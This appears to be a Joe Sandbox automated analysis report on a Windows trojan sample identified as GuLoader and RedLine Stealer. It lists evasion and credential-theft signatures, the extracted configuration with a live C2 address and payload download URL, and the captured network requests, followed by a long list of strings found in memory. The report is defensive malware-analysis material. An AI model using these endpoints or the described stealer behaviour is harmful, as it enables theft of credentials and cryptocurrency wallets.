Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report GR8jRQeRUr

Overview

General Information

Sample Name:GR8jRQeRUr (renamed file extension from none to exe)
Analysis ID:541930
MD5:30a35b83c44aba13ee4ea4ee11003419
SHA1:abbb71291df7529f46f8d5896f1bb60e2a4afc21
SHA256:fee1019ba9c5d5229717f864c5dc8e1b49150b0c4db83f4a2c9b36d51eb03025
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

GuLoader RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Crypto Currency Wallets
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Contains functionality to detect virtual machines (SLDT)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • GR8jRQeRUr.exe (PID: 6416 cmdline: "C:\Users\user\Desktop\GR8jRQeRUr.exe" MD5: 30A35B83C44ABA13EE4EA4EE11003419)
    • GR8jRQeRUr.exe (PID: 6312 cmdline: "C:\Users\user\Desktop\GR8jRQeRUr.exe" MD5: 30A35B83C44ABA13EE4EA4EE11003419)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": "194.26.229.202:18758", "Bot Id": "private_6"}

Threatname: GuLoader

{"Payload URL": "http://185.112.83.8/RamzersStubed.bin"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000F.00000002.590456261.000000001E680000.00000004.00020000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Click to see the 5 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              15.2.GR8jRQeRUr.exe.1e490ee8.3.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                15.2.GR8jRQeRUr.exe.1e210f6e.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  15.2.GR8jRQeRUr.exe.1e210f6e.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    15.2.GR8jRQeRUr.exe.1e490000.2.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      15.2.GR8jRQeRUr.exe.1e680000.4.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        Click to see the 5 entries

                        Sigma Overview

                        No Sigma rule has matched

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Found malware configurationShow sources
                        Source: 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmpMalware Configuration Extractor: RedLine {"C2 url": "194.26.229.202:18758", "Bot Id": "private_6"}
                        Source: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://185.112.83.8/RamzersStubed.bin"}
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: GR8jRQeRUr.exeVirustotal: Detection: 13%Perma Link
                        Source: GR8jRQeRUr.exeReversingLabs: Detection: 15%
                        Source: GR8jRQeRUr.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                        Source: GR8jRQeRUr.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: _.pdb source: GR8jRQeRUr.exe, 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmp
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

                        Networking:

                        barindex
                        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                        Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.3:49798 -> 185.112.83.8:80
                        C2 URLs / IPs found in malware configurationShow sources
                        Source: Malware configuration extractorURLs: http://185.112.83.8/RamzersStubed.bin
                        Source: Joe Sandbox ViewASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
                        Source: Joe Sandbox ViewASN Name: HEANETIE HEANETIE
                        Source: global trafficHTTP traffic detected: GET /RamzersStubed.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.112.83.8Cache-Control: no-cache
                        Source: global trafficTCP traffic: 192.168.2.3:49799 -> 194.26.229.202:18758
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: Yl9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587007399.00000000008F8000.00000004.00000020.sdmpString found in binary or memory: http://185.112.83.8/RamzersStubed.bin
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://ocsp.digicert.com0C
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://ocsp.digicert.com0O
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultl
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm4
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
